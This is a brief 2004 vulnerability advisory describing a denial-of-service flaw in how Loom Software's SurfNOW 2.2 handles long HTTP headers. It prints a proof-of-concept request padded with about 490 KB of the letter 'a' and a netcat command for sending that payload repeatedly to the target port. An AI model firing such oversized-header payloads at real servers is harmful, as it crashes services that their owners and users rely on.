Reported January 29, 2004 by Donato Ferrante.
Loom Software's SurfNOW 2.2 and earlier
Loom Software's SurfNOW 2.2 and earlier contains a Denial of Service (DoS) vulnerability. This vulnerability is a result of a flaw in the way SurfNOW handles long HTTP headers.
The discoverer posted the following code as proof of concept:
GET \aaaaaaaaaaaaa\[ 490 kb of a \]aaaa HTTP/1.1\n\n\n
NOTE: 490Kb of the character 'a' is being sent.
It is possible to test this bug in another way using NetCat, repetitively:
nc -v -v host 8080 < testFile.txt
( note: "testFile.txt" is a file of 490 Kb as \[1\] )
Loom Software has been notified.
Discovered by Donato Ferrante.